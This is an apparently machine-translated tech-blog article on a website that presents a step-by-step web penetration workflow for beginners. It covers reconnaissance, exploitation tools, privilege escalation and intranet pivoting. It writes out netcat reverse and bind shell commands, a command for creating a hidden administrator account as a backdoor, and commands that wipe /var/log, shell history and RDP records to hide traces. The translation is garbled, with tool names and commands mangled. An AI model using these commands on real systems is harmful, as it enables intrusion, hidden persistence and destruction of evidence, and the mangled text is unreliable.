Shulou(Shulou.com)05/31 Report--

How to achieve Web penetration analysis, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

Web penetration testing is divided into white-box testing and black-box testing. White-box testing refers to the penetration of the target website's source code and other information, which is equivalent to code analysis and audit. The black box test is to infiltrate without knowing the system information of the website, and the Web penetration mentioned below is black box penetration. Web penetration is divided into the following steps: information collection, vulnerability scanning, vulnerability exploitation, empowerment, intranet penetration, leaving the back door, and cleaning traces. The general infiltration idea is to see if there is an injection vulnerability, then inject to get the backstage administrator account password, log in to the background, upload the pony, then transmit the pony through the pony, promote the power, forward the intranet, carry out the intranet penetration, scan the surviving hosts and open ports in segment c of the intranet, see if the host has exploitable vulnerabilities (nessus) port (nmap) corresponding services and possible vulnerabilities, and take advantage of (msf) to get the intranet. Leave the back door, clear the trail. Or see if there is a place to upload files, upload a word Trojan horse, and then use a kitchen knife link, get to the database and execute the cmd command, you can continue to get on Malaysia. There are many ideas, most of the time whether it is successful or not may be a question of thinking, technology can not be high, ideas must be coquettish.

Information collection is the top priority of the whole process. The more previous information is collected, the higher the success rate of Web penetration. DNS domain name information: obtain its real ip, sub-domain name (layer sub-domain name blaster), side station (K8 side station, Yujian 1.5), paragraph c, website owner and his information (whois query) whole site information: server operating system, server type and version (Apache/Nginx/Tomcat/IIS), database type (Mysql/Oracle/Accees/Mqlserver), script type (php/jsp/asp/aspx), CMS type. The common collocation of the website is: ASP and ASPX:ACCESS, SQLServerPHP:MySQL, PostgreSQLJSP:Oracle, MySQL sensitive directory information (Royal Sword, dirbust) Open Port Information (nmp)

Vulnerability scanning uses AWVS,AppScan,OWASP-ZAP, etc., to conduct a preliminary scan of website vulnerabilities to see if there are any exploitable vulnerabilities. Common vulnerabilities: SQL injection XSS cross-site scripting CSRF cross-site request forgery XXE (XML external entity injection) vulnerability SSRF (server request forgery) vulnerability file contains vulnerability file upload vulnerability file parsing vulnerability remote code execution vulnerability CORS cross-domain resource sharing vulnerability unauthorized access vulnerability directory traversal vulnerability and arbitrary file read / download vulnerability

Exploit vulnerabilities with tools or whatever to exploit the corresponding vulnerabilities such as: Sql injection (sqlmap) XSS (BEEF) background password burst (burp) port burst (hydra)

Our permissions may be very low after we get the shell, so if we want to raise our rights, we can raise our rights according to the exp corresponding to the server version, and we can also raise the rights to the exp corresponding to the vulnerabilities in the patches of Windows systems.

Intranet penetration first port forwarding available ncnc usage: reverse connection on public network host monitoring: nc-lvp 4444 intranet host execution: nc-e cmd.exe public network host ip4444 success can get an intranet host shell forward connection remote host execution: nc-l-p4444-t-e cmd.exe local host: nc-vv remote host ip4444 is successful The local host can be a shell of the remote host, and then infiltrate the intranet. You can use the host vulnerability scanning tool (nessus,x-scan, etc.) to scan for available vulnerabilities, use msf to exploit, or use nmap to scan the surviving host and open ports. You can use hydra for port blasting or msf corresponding port corresponding vulnerabilities to get shell to take down the intranet and leave the backdoor.

Leave the backdoor for the website to upload a word Trojan, leave the backdoor for windows users can use hideadmin to create a super hidden account manual: netuser test$ 123456 / addnetlocalgroup administrators test$ / add such words can not be seen in the cmd command, but can be seen in the control panel, but also need to change the registry to control the layout can not be seen, too troublesome, do not repeat, so still use tools to save worry and effort.

Trace cleanup Log cleanup: clean up with msf in win environment The command is as follows: runclearlogsclearev if in Liunx environment: rm-f-r / var/log delete / var/log file exportHISTSIZE=0export HISTSIZE=0 delete bashshell saved last 500th command 3389 remote login record clear: @ echooff@regdelete "HKEY_CURRENT_USER\ Software\ Microsoft\ TerminalServerClient\ Default" / va / f@del "% USERPROFILE%\ My Documents\ Default.rdp" / a@exit try to use an agent during infiltration so as not to easily expose your ip. As for myself, I am also a vegetable chicken who has just entered the safety circle. The above is a summary of the infiltration process in the study. Daniel do not spray, hoping to help those information security enthusiasts who have just started.

Related exercises infiltration comprehensive scenario exercise: use the knowledge you have learned to conduct penetration testing on the target, obtain the permissions of the target system, so as to obtain sensitive information, then congratulations, you have completed the transformation from a security rookie to a penetration testing engineer.

After reading the above, have you mastered the method of how to realize the analysis of Web penetration? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.